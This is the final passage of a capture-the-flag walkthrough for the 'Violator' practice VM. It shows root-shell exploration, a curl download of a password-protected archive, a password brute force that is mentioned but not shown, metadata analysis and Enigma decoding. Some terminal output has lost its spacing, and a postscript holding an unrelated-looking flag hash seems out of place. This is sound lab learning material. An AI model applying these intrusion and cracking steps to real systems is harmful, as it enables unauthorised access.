Checking for our flag, as I expected, was a troll
root@violator:/root# cat flag.txt
cat flag.txt
I say... I say... I say boy!Pumpingfor oil or something...?---FoghornLeghorn"A Broken Leghorn"1950(C) W.B.
The hidden directory ‘basildon’ in the root directory contains a file, crocs.rar.
root@violator:/root# ls -lah
ls -lah
total 24K
drwx------3 root root 4.0KJun1419:56.
drwxr-xr-x 22 root root 4.0KJun1419:44..-rw-r--r--1 root root 3.1KFeb202014.bashrc
d--x------2 root root 4.0KJun1419:57.basildon
-rw-r--r--1 root root 114Jun1210:22 flag.txt
-rw-r--r--1 root root 140Feb202014.profile
root@violator:/root# cd .basildon
cd .basildon
root@violator:/root/.basildon# ls -lah
ls -lah
total 148K
d--x------2 root root 4.0KJun1419:57.
drwx------3 root root 4.0KJun1419:56..-rw-r--r--1 root root 138KJun1214:46 crocs.rar
I move the file over to the web root and pull it down locally for analysis.
root@mrb3n:~/violator# curl -O http://192.168.110.183/crocs.rar
%Total%Received%XferdAverageSpeedTimeTimeTimeCurrentDloadUploadTotalSpentLeftSpeed100137k100137k0020.6M0--:--:----:--:----:--:--22.3M
root@mrb3n:~/violator# file crocs.rar
crocs.rar: RAR archive data, v1d, os:Win32
root@mrb3n:~/violator# unrar e crocs.rar
UNRAR 5.21 freeware Copyright(c)1993-2015AlexanderRoshalExtractingfrom crocs.rar
Enter password (will not be echoed)for artwork.jpg:
Hmm, a password protected rar containing an image file. I was stuck here for a while. First I used Cewl to create a word list based on our original Wikipedia page but had no luck. I then ran the earlier song list without spaces that got us our user accounts and still no luck. Combining everything I had and using a quick rar brute force Python script I got a result.
This time exiftool gave us something juicy, which I believe is our Engima code.
root@mrb3n:~/violator# wine /root/Desktop/exiftool.exe artwork.jpg
ExifToolVersionNumber:10.07FileName: artwork.jpg
Directory:.FileSize:183 kB
FileModificationDate/Time:2016:06:1214:38:12-04:00FileAccessDate/Time:2016:09:1621:03:34-04:00FileCreationDate/Time:2016:06:1214:38:12-04:00FilePermissions: rw-rw-rw-FileType: JPEG
FileTypeExtension: jpg
MIME Type: image/jpeg
JFIF Version:1.01ResolutionUnit: inches
X Resolution:300
Y Resolution:300ExifByteOrder:Big-endian (Motorola, MM)ImageDescription:ViolatorSoftware:GoogleArtist:DaveGahamCopyright: UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
ExifVersion:0220Date/TimeOriginal:1990:03:1922:13:30CreateDate:1990:03:1922:13:30SubSecTimeOriginal:04SubSecTimeDigitized:04ExifImageWidth:1450ExifImageHeight:1450
XP Title:Violator
XP Author:DaveGaham
XP Keywords: created by user dg
XP Subject: policyoftruth
Padding:(Binary data 1590 bytes,use-b option to extract)About: uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights: UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Creator:DaveGahamSubject: created by user dg
Title:ViolatorDescription:ViolatorWarning:[minor]Fixed incorrect URI for xmlns:MicrosoftPhotoDateAcquired:1941:05:0910:30:18.134LastKeyword XMP : created by user dg
ImageWidth:1450ImageHeight:1450EncodingProcess:Baseline DCT,Huffman coding
BitsPerSample:8ColorComponents:3
Y CbCrSubSampling:YCbCr4:2:0(22)ImageSize:1450x1450Megapixels:2.1CreateDate:1990:03:1922:13:30.04Date/TimeOriginal:1990:03:1922:13:30.04
I was unable to get the Minarke program to work but the following decoder decoded the text for me. I just had to fix up the spacing to fully read the message.
ONE FINAL CHALLENGE FOR YOU BGHX
CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR
ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE IN TO KEEP YOU ON YOUR TOES
ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR
SHOUT OUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN
KNIGHTMARE
An update on knightmare’s Twitter here tells us that the final message should read BGH 393X. A little research leads us to this message board which tells us that this is the license plate for a 1981 Ford Corina MkV in the music video for the Depeche Mode song ‘Useless’.
Overall this one a fun VM with plenty of twists and turns. I learned some new techniques and about the band Depeche Mode. Thank you knightmare for the challenge and sharing a bit of culture with us.
As always, thank you to g0tmi1k and the vulnhub team for maintaining this great resource/community.
Cheers,
Bob.
PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...
PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}
